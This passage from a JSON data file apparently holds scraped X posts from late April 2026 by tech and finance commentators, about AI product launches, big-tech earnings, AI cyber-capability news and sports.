"https://x.com/jason/status/2050009016105930837"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-05-01T00:22:01+00:00", "title": "Apocalypses (apocalypsii?) are fungible.", "url": "https://x.com/pmarca/status/2050007800882122833"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-05-01T00:20:30+00:00", "title": "THIS IS INSANE 🔥\n\nPURE DOMINATION 🤦\n\nATL DOES HAVE SOME GREAT RAPPERS 😂😂😂", "url": "https://x.com/jason/status/2050007416964591880"}, {"handle": "AravSrinivas", "name": "Aravind Srinivas", "published_at": "2026-05-01T00:18:54+00:00", "title": "RT by @AravSrinivas: $AAPL CFO:\n\n“Leading AI developers like Perplexity are choosing Mac as their preferred platform to build enterprise-grade AI assistants that power autonomous agents and boost workplace productivity.”", "url": "https://x.com/AravSrinivas/status/2050007015616135365"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-05-01T00:09:03+00:00", "title": "Concerning. https://nypost.com/2026/04/30/business/inside-the-ai-doom-machine-and-who-is-benefiting-from-it/", "url": "https://x.com/pmarca/status/2050004538216886756"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-05-01T00:08:27+00:00", "title": "OpenRouter 又上了匿名新模型Owl Alpha!\n\n 1M 上下文,强大的工具调用能力!\n猜猜他是谁家的哈哈😂", "url": "https://x.com/berryxia/status/2050004383971282952"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-05-01T00:00:12+00:00", "title": "兄弟们!老马家的Grok Image终于……\n\nGrok Image Agent 网页版Beta 版本已经上线,目前应该是给付费用户灰度推送中!\n\n这是一款全能创意Agent,可在无限开放画布上独立创作。\n\nGrok Agent在同一工作区内,自动完成规划→生成→编辑→迭代的全流程创作。\n\n只需下达指令,即可观看它在无缝衔接的工作区中,自动完成规划、生成、编辑与迭代:\n\n• 🎬 “生成一部 1 分钟电影级短片”\n\n• 📚 “创作一整套漫画”\n\n• 🛍️ “制作用户生成内容(UGC)产品故事”\n\n这是从简单提示词到端到端创意制作的真正飞跃。\n\n这是 Gro", "url": "https://x.com/berryxia/status/2050002308759695561"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-30T23:56:28+00:00", "title": "这个小哥读完Anthropic关于智能体AI的博客后,我梳理出一套心智模型,用来理解并拆解智能体AI架构的设计逻辑。\n\n设定任务与目标\n\n明确你希望AI智能体需要完成、达成的具体事项。\n\n1. 编排层 Orchestration layer\n相当于整套系统的控制面板,负责全局调度与流程统筹。\n\n2. 智能体层 Agents layer\n由多个专用/通用智能体组成,也就是多智能体分工协作架构。\n\n3. 工具层 Tools\n为智能体提供各类能力支撑,例如网页搜索、数据库查询、第三方API调用等。\n\n4. 记忆层 Memory\n系统的“大脑”,负责存储短期记忆", "url": "https://x.com/berryxia/status/2050001371307646977"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-30T23:46:56+00:00", "title": "刚刚看到Claude Security 现已进入公测阶段!可以让Claude 帮你检查漏洞了啊!\n\n目前已经内置于网页版的 Claude Code 中。\n\n只需将其指向一个代码仓库,即可获得经过验证的漏洞发现结果,并在 正在编写代码的同一位置修复它们!\n\n这个功能挺实用,什么时候可以直接cc里可以用。\n\n地址:https://claude.com/product/claude-security", "url": "https://x.com/berryxia/status/2049998972484567491"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-30T23:46:40+00:00", "title": "wow. incredible.", "url": "https://x.com/GaryMarcus/status/2049998902452183488"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-30T23:41:23+00:00", "title": "你看看大模型有多重?\n这个挺有意思的😂", "url": "https://x.com/berryxia/status/2049997574229446812"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-30T23:36:38+00:00", "title": "this is … odd. \n\nthe whole problem with agentic code is that people wind up with hard to debug redundancies, security holes, deleted databases, etc., which is exactly why you need roadmaps and code reviews, with AI-written code. \n\nI am with @Grady_Booch on this one (and almost e", "url": "https://x.com/GaryMarcus/status/2049996377678057717"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-30T23:34:02+00:00", "title": "Claude& Blender 🐮🍺", "url": "https://x.com/berryxia/status/2049995723580850235"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-30T23:30:42+00:00", "title": "Very quiet @ATLHawks 🤫", "url": "https://x.com/jason/status/2049994885185384483"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-30T23:30:42+00:00", "title": "2026年你必须了解的6个大语言模型(LLM)知识库专业术语!\n\n(大多数团队至少缺失其中3项,这会让他们的智能AI代理付出代价)\n\n1. LLM Knowledge Base 大语言模型知识库\n\n一种能够让大语言模型接收原始资料、整理成结构化维基文档,并通过自有索引检索来回答问题的系统。安德烈·卡尔帕西曾为自己搭建过一套。该技术的难点在于:搭建一套能适配整个团队协同使用的知识库。\n\n2. Continuous Ingestion 持续数据摄取\n\n自动从所有日常工作工具中同步信息,包括即时通讯软件、客户关系管理系统、会议记录、文档资料等,全程无需人工维护", "url": "https://x.com/berryxia/status/2049994885764419789"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-30T23:29:59+00:00", "title": "RT by @Jason: Wow @Jason wasn’t kidding these Toyota Alphard vans are incredible. Why don’t they sell these in America?", "url": "https://x.com/jason/status/2049994707061911758"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-30T23:25:26+00:00", "title": "兄弟们!嘴撸360 全景沉浸式体验小游戏!时代来了!\n\n直接把这个Prompt丢给Flowith然后和Codex链接,图片直接整成360度场景图!\n\nPrompt:👇\n\n1. 给图像Agent一个简单的提示,让它研究 AI 公司吉祥物并生成一个 360° 动物园。\n2. 将全景图输入你的 Codex 以获得 3D 视图。", "url": "https://x.com/berryxia/status/2049993558577619280"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-30T23:21:37+00:00", "title": "这几天使用Cursor 就发现在最后一步会有一个bug检测什么的的执行MCP一直提示我。\n\n现在Curosr针对企业和Team版本有专门的针对安全漏洞做了审核的Agent!", "url": "https://x.com/berryxia/status/2049992598639755395"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-30T23:19:35+00:00", "title": "Gemini Embedding 2 已正式发布!\nRAG 知识库的应用又可以支持的更好了。", "url": "https://x.com/berryxia/status/2049992087547130254"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-30T23:17:56+00:00", "title": "苹果内部正在使用一款名为 AFM Playground 的应用程序,它看起来与 ChatGPT 非常相似,但使用的是苹果的 Foundation Models。\n\n不知道能搞出来个啥?", "url": "https://x.com/berryxia/status/2049991672155750500"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-30T23:16:18+00:00", "title": "在这场访谈中,Karpathy 分享了他作为程序员在 AI 时代的亲身经历与深刻洞见。\n\n他表示,2025 年 12 月成为他的个人转折点:AI 生成的代码从“有帮助但常需修改”转变为“直接可用”,他已记不清上一次亲自修改 AI 输出是什么时候,从此进入\n“Vibe Coding”的状态。 \n\nKarpathy 将软件开发划分为三个阶段:\n\nSoftware 1.0 是传统显式代码编程,Software 2.0 是神经网络时代,而 Software 3.0 则是大语言模型时代。\n\n在 Software 3.0 中,编程的核心不再是逐行编写代码,而是通过", "url": "https://x.com/berryxia/status/2049991262934380898"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-30T23:06:04+00:00", "title": "这一波GPT- Image-2 出圈的原因感觉更多的是将其结合游戏真实的UI设计融合且效果出奇好。\n\n省token简单的prompt就可以完成,开发3D游戏也可以快速打好草稿。", "url": "https://x.com/berryxia/status/2049988686788558992"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-30T23:03:19+00:00", "title": "David Sacks 在 X 平台上发布了一条推文,对 AI Security Institute 刚刚发布的公告进行了回应。\n\nAI Security Institute 宣布 OpenAI 的 GPT-5.5 模型(cyber 版本)成功完成了他们设计的“多步网络攻击模拟”。\n\n也成为第二个能端到端完成整个攻击链的模型(第一个是 Anthropic 的 Mythos)。 \n\n在推文中,David Sacks 表示,是时候揭开 Mythos 的神秘面纱了。\n\n他强调,Mythos 并非什么魔法,也不是末日武器,它只是众多能够自动化网络安全任务的模型", "url": "https://x.com/berryxia/status/2049987993193402677"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-30T23:02:00+00:00", "title": "RT by @Jason: What if you had a live fact-checker and a devil's advocate running in your ear during every podcast, call, or stream?\n\nI built that. One hour. One Claude Code session.\n\nGary catches bad stats and wrong dates. Rex pushes back on everything.\n\nOpen source repo in the t", "url": "https://x.com/jason/status/2049987662526992390"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-30T22:57:08+00:00", "title": "𝕏 网页端更新Cashtags 功能,可以给每个股票提供实时图表。", "url": "https://x.com/berryxia/status/2049986437194621357"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-30T22:53:19+00:00", "title": "Stripe 重磅推出 Link CLI!\nAgent 终于能安全花钱了:单次凭证 + 同步人工审批,Claude 买礼物都不怕乱花!\n\n1. 一行命令让 Agent 创建一次性支付凭证\n2. 每次消费你都收到实时推送并用 FaceID 确认\n3. 彻底解决 Agent 支付信任问题,安全又方便\n4. Claude 已经实测:自己挑礼物上 Gumroad 下单,完美闭环\n\nAgent 时代支付基础设施来了,开发者直接告诉你的 Agent 去用!\n\n项目地址:\nhttps://github.com/stripe/link-cli", "url": "https://x.com/berryxia/status/2049985476334100833"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-30T22:32:57+00:00", "title": "For the record, I got a couple of milly at JPMorgan — and I think Lorna is innocent of all charges.", "url": "https://x.com/jason/status/2049980353155064279"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-30T22:30:40+00:00", "title": "What’s good Atlanta", "url": "https://x.com/jason/status/2049979777864331542"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-30T22:16:09+00:00", "title": "Hardwood in the ATL", "url": "https://x.com/jason/status/2049976123891552679"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-30T22:15:21+00:00", "title": "Real life! With Jose! @AlvaradoJose15", "url": "https://x.com/jason/status/2049975924238569627"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-30T21:51:45+00:00", "title": "Q1 Revenue Growth, YoY % Change...\nMeta $META: +33%\nGoogle $GOOGL: +22%\nMicrosoft $MSFT: +18%\nApple $AAPL: +17%\nAmazon $AMZN: +17%\nNetflix $NFLX: +16%\nTesla $TSLA: +16%\nS&P 500 $SPY: +10%", "url": "https://x.com/charliebilello/status/2049969984432914819"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-30T21:33:17+00:00", "title": "Actually, for Uber Black, Blacklane and private drivers this is standard (I use all three, all the time). \n\nFor UberX? \n\nSure, they would need to be convinced.\n\nin a world moving to autonomy, the opportunity for humans is to add security, tasks, waiting and valet-like services to", "url": "https://x.com/jason/status/2049965338368819443"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-30T21:30:21+00:00", "title": "Who made this?!", "url": "https://x.com/jason/status/2049964597403140486"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-30T21:28:45+00:00", "title": "Valid.", "url": "https://x.com/pmarca/status/2049964195954020800"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-30T21:27:00+00:00", "title": "San Francisco politicians and their constituents enable this suffering. \n\nThey are the cause of it, because they can stop it instantly. \n\nToday, tomorrow and every one of the last 1,000 days this has happened. \n\nFentanyl is a super drug and we should have zero tolerance for the d", "url": "https://x.com/jason/status/2049963757036536190"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-30T21:23:23+00:00", "title": "Please stop.", "url": "https://x.com/jason/status/2049962845849170234"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-30T21:16:00+00:00", "title": "Apple revenues increased 17% over the last year to a new Q1 record of $111 billion. Net Income grew 19% year-over-year to new Q1 record of $30 billion. Gross margins increased to 49% (from 47% a year ago), the highest margin in company history. $AAPL\n\nhttps://bilello.blog/newslet", "url": "https://x.com/charliebilello/status/2049960986468069507"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-30T21:13:28+00:00", "title": "RT by @GaryMarcus: Cuando sucede un problema en un puesto automatizado por la IA... ¿Quién es el responsable?", "url": "https://x.com/GaryMarcus/status/2049960351198839176"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-30T20:59:29+00:00", "title": "Who is accountable? \n\nthe latest from @marketoonist", "url": "https://x.com/GaryMarcus/status/2049956829019447683"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-30T20:57:41+00:00", "title": "Incredible: Amazon's AWS revenue over the last 12 months ($137 billion) was higher than the revenue of 472 companies in the S&P 500. $AMZN\n\nhttps://bilello.blog/newsletter", "url": "https://x.com/charliebilello/status/2049956378660200794"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-30T20:47:59+00:00", "title": "Amazon Revenue (Billions)\n2026 (est): 810\n2025: 717\n2024: 638\n2023: 575\n2022: 514\n2021: 470\n2020: 386\n2019: 281\n2018: 233\n2017: 178\n2016: 136\n2015: 107\n2014: 89\n2013: 74\n2012: 61\n2011: 48\n2010: 34\n2009: 25\n2008: 19\n2007: 15\n2006: 11\n\n24% annualized growth over the last 20 years", "url": "https://x.com/charliebilello/status/2049953936212217973"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-30T20:43:38+00:00", "title": "Dear @elonmusk,\n\nIf you still genuinely care about AI safety, you can’t let the Trump administration leave the AI industry almost entirely unregulated. \n\nYou just can’t.\n\n- Gary", "url": "https://x.com/GaryMarcus/status/2049952842010751095"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-30T20:43:29+00:00", "title": "Pregame!", "url": "https://x.com/jason/status/2049952806451171669"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-30T20:39:00+00:00", "title": "Multi-year contracts don't matter. \n\n\"Deferred churn is still churn, it just shows up later.\n\nLong contracts do not mean customers are loyal, they just delay the moment they leave.\n\nIf a better solution comes along, they will switch when the contract ends.\" @jasonlk\n\nDoes getting", "url": "https://x.com/HarryStebbings/status/2049951674891203065"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-30T20:35:03+00:00", "title": "Amazon revenues increased 17% over the last year to a new Q1 record of $182 billion. Net Income increased 77% YoY to $30 billion, the highest quarterly profit in company history. Operating margins increased to a record 13.4% from 12.0% a year ago. $AMZN", "url": "https://x.com/charliebilello/status/2049950680236827140"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-30T20:32:53+00:00", "title": "The everything app! Go @uber go!", "url": "https://x.com/jason/status/2049950138735407393"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-30T20:29:30+00:00", "title": "Enjoying giving bounties in the vibecoding era \n\nLooking for someone to build annotated dot com in this podcast contest \n\nWinner gets $5k \n\nGLHF!", "url": "https://x.com/jason/status/2049949284267590094"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-04-30T20:16:55+00:00", "title": "big upgrade for codex today!\n\ntry it for non-coding computer work.", "url": "https://x.com/sama/status/2049946120441520624"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-04-30T20:12:24+00:00", "title": "it does seem cool", "url": "https://x.com/sama/status/2049944981750833659"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-30T19:56:39+00:00", "title": "somebody feels very rejected 🤷‍♂️", "url": "https://x.com/GaryMarcus/status/2049941019077247438"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-04-30T19:23:47+00:00", "title": "RT by @sama: Computer Use runs this use case 42% faster in today's Codex app update.", "url": "https://x.com/sama/status/2049932746567598472"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-30T19:18:32+00:00", "title": "RT by @Jason: J-Cal is offering a $5K bounty to whoever can execute his idea for annotated .com! Think you have what it takes? 🧵\n\n@Jason", "url": "https://x.com/jason/status/2049931426972180820"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-04-30T19:08:00+00:00", "title": "RT by @sama: It's never been easier to do everyday work with Codex.\n\nChoose your role, connect the apps you use every day, and try suggested prompts.\n\nCodex helps with everything from research and planning to docs, slides, spreadsheets, and more.", "url": "https://x.com/sama/status/2049928776147230886"}, {"handle": "cursor_ai", "name": "Cursor", "published_at": "2026-04-30T18:58:07+00:00", "title": "R to @cursor_ai: We’re continuing to improve the runtime, harness, and models powering Cursor Security Review for a strong out-of-the-box experience.\n\nSecurity agents draw from your existing usage pool. \n\nLearn more: http://cursor.com/docs/security-review", "url": "https://x.com/cursor_ai/status/2049926287439929475"}, {"handle": "cursor_ai", "name": "Cursor", "published_at": "2026-04-30T18:58:06+00:00", "title": "R to @cursor_ai: Customize these Cursor-managed security agents to match your team’s requirements.\n\nAdjust triggers, add your own instructions, give them custom tooling, and choose how outputs are shared.", "url": "https://x.com/cursor_ai/status/2049926285518848093"}, {"handle": "cursor_ai", "name": "Cursor", "published_at": "2026-04-30T18:58:06+00:00", "title": "Cursor Security Review is now available for Teams and Enterprise plans.\n\nRun two types of always-on agents:\n1. Security Reviewer checks every PR for vulnerabilities and leaves comments.\n2. Vulnerability Scanner runs scheduled scans of your codebase and posts findings in Slack.", "url": "https://x.com/cursor_ai/status/2049926283061035254"}, {"handle": "realNyarime", "name": "奶昔", "published_at": "2026-04-30T18:49:33+00:00", "title": "还得是投行的女高管,操控股价有水平的", "url": "https://x.com/realNyarime/status/2049924132037693573"}, {"handle": "svwang1", "name": "王川(硅谷)", "published_at": "2026-04-30T18:43:10+00:00", "title": "R to @Svwang1: 李克用在 884年消灭黄巢的战斗中起到决定性作用,但在回师路上的“上元驿之变”中差点被朱温暗算杀害。", "url": "https://x.com/svwang1/status/2049922524839018604"}, {"handle": "svwang1", "name": "王川(硅谷)", "published_at": "2026-04-30T18:36:57+00:00", "title": "按照这个研究,李克用的基因大概 53%来自东北亚,47% 来自西亚到欧洲的大草原 (western steppe). 按照Ai 的说法,后者的基因主要在芬兰人和瑞典人中居多。\n\n李克用的儿子李存勖 (后唐庄宗)的子嗣,在 926年的兴教门之变后都被杀光,所以估计现在还带着他的基因的,是李存勖的兄弟的后代。", "url": "https://x.com/svwang1/status/2049920960724427165"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-30T18:34:10+00:00", "title": "Co-sign.", "url": "https://x.com/pmarca/status/2049920259432513702"}, {"handle": "DavidSacks", "name": "David Sacks", "published_at": "2026-04-30T18:34:10+00:00", "title": "RT by @DavidSacks: Co-sign.", "url": "https://x.com/DavidSacks/status/2049920259432513702"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-30T18:34:04+00:00", "title": "Gas prices in California have moved up above $6.00/gallon, 40% higher than the US national average ($4.30/gallon).", "url": "https://x.com/charliebilello/status/2049920236002963504"}, {"handle": "eladgil", "name": "Elad Gil", "published_at": "2026-04-30T18:31:25+00:00", "title": "🔥", "url": "https://x.com/eladgil/status/2049919569134047726"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-30T18:08:56+00:00", "title": "The S&P 500 just crossed above 7,200 for the first time. A year ago it was at 5,600. 5 years ago it was at 4,200. 10 years ago it was at 2,100. $SPX", "url": "https://x.com/charliebilello/status/2049913908861792603"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-30T17:49:50+00:00", "title": "John Oliver @LastWeekTonight slays a pile of greedy tech CEOs, gives props to @GaryMarcus 😻\n\nThe tides are changing, and other folks like @wendyweeww are speaking out in support.", "url": "https://x.com/GaryMarcus/status/2049909103129251864"}, {"handle": "eladgil", "name": "Elad Gil", "published_at": "2026-04-30T17:48:18+00:00", "title": "RT by @eladgil: Your honour, I think this should be allowed.", "url": "https://x.com/eladgil/status/2049908719782334528"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-30T17:45:25+00:00", "title": "RT by @pmarca: It’s time to demystify Mythos. \n\nMythos is not magic. It’s not a doomsday device. It’s the first of many models that can automate cyber tasks (just like coding). \n\nOpenAI’s GPT-5.5-cyber can now do the same. And all the frontier models (including those from China) ", "url": "https://x.com/pmarca/status/2049907993588769006"}, {"handle": "DavidSacks", "name": "David Sacks", "published_at": "2026-04-30T17:45:25+00:00", "title": "It’s time to demystify Mythos. \n\nMythos is not magic. It’s not a doomsday device. It’s the first of many models that can automate cyber tasks (just like coding). \n\nOpenAI’s GPT-5.5-cyber can now do the same. And all the frontier models (including those from China) will be there w", "url": "https://x.com/DavidSacks/status/2049907993588769006"}, {"handle": "karpathy", "name": "Andrej Karpathy", "published_at": "2026-04-30T17:43:06+00:00", "title": "This is the the quote I've been citing a lot recently.", "url": "https://x.com/karpathy/status/2049907410303865030"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-30T17:35:00+00:00", "title": "What the public markets are getting wrong about the SaaS-pocalypse\n\n\"The public markets are directionally right, but missing the real shift.\n\nThe threat is not AI tools themselves, it is the agents deciding what tools to use.\n\nWinners will be the companies' agents choose to integ", "url": "https://x.com/HarryStebbings/status/2049905369963745470"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-30T17:32:47+00:00", "title": "OpenAI’s lawyer plays dirty. Why I am not surprised?", "url": "https://x.com/GaryMarcus/status/2049904811165008099"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-04-30T17:29:15+00:00", "title": "lisan say more mean things about us you're being too nice", "url": "https://x.com/sama/status/2049903925311267311"}, {"handle": "karpathy", "name": "Andrej Karpathy", "published_at": "2026-04-30T17:28:50+00:00", "title": "Fireside chat at Sequoia Ascent 2026 from a ~week ago. Some highlights:\n\nThe first theme I tried to push on is that LLMs are about a lot more than just speeding up what existed before (e.g. coding). Three examples of new horizons:\n\n1. menugen: an app that can be fully engulfed by", "url": "https://x.com/karpathy/status/2049903821095354523"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-30T17:23:08+00:00", "title": "Wild graph from @Evident_HQ:", "url": "https://x.com/GaryMarcus/status/2049902385808744558"}, {"handle": "cursor_ai", "name": "Cursor", "published_at": "2026-04-30T17:19:22+00:00", "title": "Our agent harness makes models inside Cursor faster, smarter, and more token-efficient.\n\nHere's how we test improvements to the harness, monitor and repair degradations, and customize it for different models.\n\nhttp://cursor.com/blog/continually-improving-agent-harness", "url": "https://x.com/cursor_ai/status/2049901436918436249"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-30T17:05:02+00:00", "title": "Global Central Bank Update:\n-Brazil cut rates for the second month in a row, 25 bps move down to 14.50%.", "url": "https://x.com/charliebilello/status/2049897830567862624"}, {"handle": "lxfater", "name": "铁锤人", "published_at": "2026-04-30T17:01:35+00:00", "title": "GPT-5.5的网络攻击能力好像比前段时间吹上天的Mythos\n\n没差这么多呀😂", "url": "https://x.com/lxfater/status/2049896961382203667"}, {"handle": "realNyarime", "name": "奶昔", "published_at": "2026-04-30T17:00:21+00:00", "title": "这下不止中国大陆,连香港到美的互联也要玩烂了!\nFCC表决撤销中资运营商的一揽子授权之提议,目的是堵住 2022 年的法律漏洞:即使「中资运营商」的通信牌照被撤销,它们仍可根据一揽子授权(Blanket Authority)自动获得美国国内的州际电信服务资质\n\n会议中最激进的部分是关于禁止互联(Interconnection)的讨论,即讨论将从物理上禁止Verizon、AT&T等美资运营商与中资运营商的互联。如此一来,不仅电信、联通、移动、中信的美国电信业务被踢出局,还会连带IDC、IXP、PoP一同被赶这次行动会祭出「股权穿透」大招,即电信、联通、移动", "url": "https://x.com/realNyarime/status/2049896651989614721"}, {"handle": "Pluvio9yte", "name": "雪踏乌云", "published_at": "2026-04-30T16:37:50+00:00", "title": "OpenAI 发了篇博客复盘自家模型一个挺有意思的\"口癖哥布林\"问题,\n\n从 GPT-5.1 起,他们的模型莫名其妙开始爱用 goblin、gremlin 这些怪物词打比方,越往后越泛滥。\n\nOpenAI 一路扒数据,定位到是训练 \"Nerdy\"(书呆子气)人格时,奖励信号意外地给\"用怪物词做比喻\"加了高分。\n\n具体证据:\n1. GPT-5.1 上线后,ChatGPT 里 goblin 用量涨了 175%,gremlin 涨了 52%。\n\n2. Nerdy 人格只占所有回答的 2.5%,却贡献了 66.7% 的 goblin。76.2% 的数据集里,带怪", "url": "https://x.com/Pluvio9yte/status/2049890985631768653"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-30T16:35:11+00:00", "title": "would be very surprising if he didn’t. let’s see who can spot them first.", "url": "https://x.com/GaryMarcus/status/2049890318200570310"}, {"handle": "realNyarime", "name": "奶昔", "published_at": "2026-04-30T16:33:28+00:00", "title": "N26关门了,中港澳台全部不接受", "url": "https://x.com/realNyarime/status/2049889887684616218"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-30T16:25:11+00:00", "title": "👀回顾来时路\n\n从这条推文开始,进行了9个月的日更推文\n\n经历了内容方向的摸索、带人X增长与知识付费和自身X增长矛盾的时期、B端业务探索\n\n算是找到了点出路\n\n离职的可以参考下,在职的也要掂量下", "url": "https://x.com/GoSailGlobal/status/2049887802863583240"}, {"handle": "AndrewYNg", "name": "Andrew Ng", "published_at": "2026-04-30T16:21:35+00:00", "title": "Pinned: How we prompt AI is very different in 2026 than 2022 when ChatGPT came out.\n\nI'm teaching a new course, AI Prompting for Everyone, to help you become an AI power user — whatever your current skill level.\n\nIt covers skills that apply across ChatGPT, Gemini, Claude, and oth", "url": "https://x.com/AndrewYNg/status/2049886895530967534"}, {"handle": "Pluvio9yte", "name": "雪踏乌云", "published_at": "2026-04-30T16:18:34+00:00", "title": "A÷你认真的吗,38分钟打满了😅", "url": "https://x.com/Pluvio9yte/status/2049886136580137378"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-30T16:02:50+00:00", "title": "RT by @charliebilello: Microsoft Revenues (Billions)...\n2026 (est): 354\n'25: 305\n'24: 262\n'23: 228\n'22: 203\n'21: 185\n'20: 153\n'19: 134\n'18: 118\n'17: 102\n'16: 95\n'15: 88\n'14: 93\n'13: 83\n'12: 73\n'11: 72\n'10: 67\n'09: 59\n'08: 62\n'07: 58\n'06: 46\n'05: 41\n'04: 38\n'03: 34\n'02: 31\n'01: 27", "url": "https://x.com/charliebilello/status/2049882175433015544"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-30T16:02:00+00:00", "title": "Naval 讲了一句让我转身就去打开 Cursor 的话\n\n电子游戏给你的是假奖励真多巴胺 \n\nvibe coding 给你的是真奖励真多巴胺\n\n游戏让你卡在能力边缘,但世界是别人造的,迟早通关 \n\nvibe coding 底下跑的是图灵机,无界,目标自己定,做出来的东西是真的\n\n他一批朋友因此\"消失了\",钻进去做自己想了很多年的那个 app \n\n他自己也在一个人重做 Airchat\n\n而最难的不是写代码,是知道你要什么", "url": "https://x.com/GoSailGlobal/status/2049881966850499058"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-30T15:59:15+00:00", "title": "RT by @GaryMarcus: One underdiscussed part of the Google-DOD deal is how it blindsided the company’s own employees.\n\nOne told @cogcelia that senior management had repeatedly insisted Google wouldn’t cave to the Pentagon’s demands — which proved not to be true.\n\nhttps://www.transf", "url": "https://x.com/GaryMarcus/status/2049881272990789710"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-30T15:58:18+00:00", "title": "Mitchell(Vagrant、Terraform、Ghosty 的作者)今天宣布离开 GitHub \n\nGitHub 第 1299 号用户,注册 18 年,几乎没断过一天 \n\n他说写完离别帖,眼泪滴到了键盘上\n\n不是矫情,是 GitHub 真的快不能用了\n\n最近两周连续翻车 \n\n1️⃣ 4 月 23 日 merge queue 出 bug,2800 多个 PR 被静默撤回,已经合进主干的代码凭空消失 \n\n2️⃣ 拉取请求 API 整整一个工作日打不开 \n\n3️⃣ 一个 RCE 漏洞,黑客一个 git push -O 就能访问上百万仓库 TanStac", "url": "https://x.com/GoSailGlobal/status/2049881037547999546"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-30T15:54:48+00:00", "title": "RT by @charliebilello: Google Revenues (Billions)...\n2026 (est): 476\n2025: 403\n2024: 350\n2023: 307\n2022: 283\n2021: 258\n2020: 183\n2019: 162\n2018: 137\n2017: 111\n2016: 90\n2015: 75\n2014: 66\n2013: 56\n2012: 46\n2011: 38\n2010: 29\n2009: 24\n2008: 22\n2007: 17\n2006: 11\n2005: 6.1\n2004: 3.2\n$G", "url": "https://x.com/charliebilello/status/2049880154629878151"}, {"handle": "dingyi", "name": "Ding", "published_at": "2026-04-30T15:37:12+00:00", "title": "The future of product design.", "url": "https://x.com/dingyi/status/2049875727689146789"}, {"handle": "realNyarime", "name": "奶昔", "published_at": "2026-04-30T15:31:15+00:00", "title": "所以GPT的Plus和Team额度差多少", "url": "https://x.com/realNyarime/status/2049874226778452072"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-30T15:31:09+00:00", "title": "RT by @GaryMarcus: Big Tech’s $700 billion spending on AI this year is called the ‘greatest capital misallocation in history’ https://trib.al/qUQIbrJ", "url": "https://x.com/GaryMarcus/status/2049874202983870910"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-30T15:25:23+00:00", "title": "ChatGPT 还在让你复制粘贴的时候,Gemini 已经把活儿干完了 \n\n昨天 Google 